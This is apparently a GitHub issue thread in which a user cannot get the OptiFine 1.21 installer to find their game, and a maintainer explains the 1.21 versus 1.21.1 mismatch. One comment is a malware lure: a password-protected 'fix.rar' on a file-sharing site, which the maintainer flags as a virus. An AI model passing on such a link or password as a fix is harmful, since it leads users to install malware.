### ISSUE TITLE
[OptiFine HD U J1 pre2] Cannot find Minecraft 1.21

### ISSUE THREAD

**Issue by LethalJezebel** [sp614x/optifine#7721]
## OptiFine HD U J1 pre2 not working

When I downloaded Optifine 1.21 it's saying that it can not locate Minecraft 1.21 even tho I have been playing on this version for a while now. Am I doing something wrong?

![image](https://github.com/user-attachments/assets/5436f637-34bf-42dc-8f09-1f9c42881be9)

## Steps to Reproduce

1. Downloaded OptiFine HD U J1 pre2
2. Clicked on Install
3. Got the error shown above

## OptiFine Version

OptiFine HD U J1 pre2

## Installation Method

https://optifine.net/downloads

## Other Installed Mods

Mods are installed through CursedForge.
BiomesOPlenty
GlitchCore
JourneyMap
Moobloom
TerraBlender

## Log Files/Crash Reports

![image](https://github.com/user-attachments/assets/7221ddc6-8d39-49af-99c0-6591f2b3701d)

**Comment by KaiAF** [comment]
Do what it says. You are launching the version **1.21.1** and not **1.21**. They are two different versions.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by KaiAF** [comment]
don't click that link, it's a virus

**Comment by LethalJezebel** [comment]
How do i launch it as 1.21 then? im new to java. 1.21.1 is all what loaded up for me.
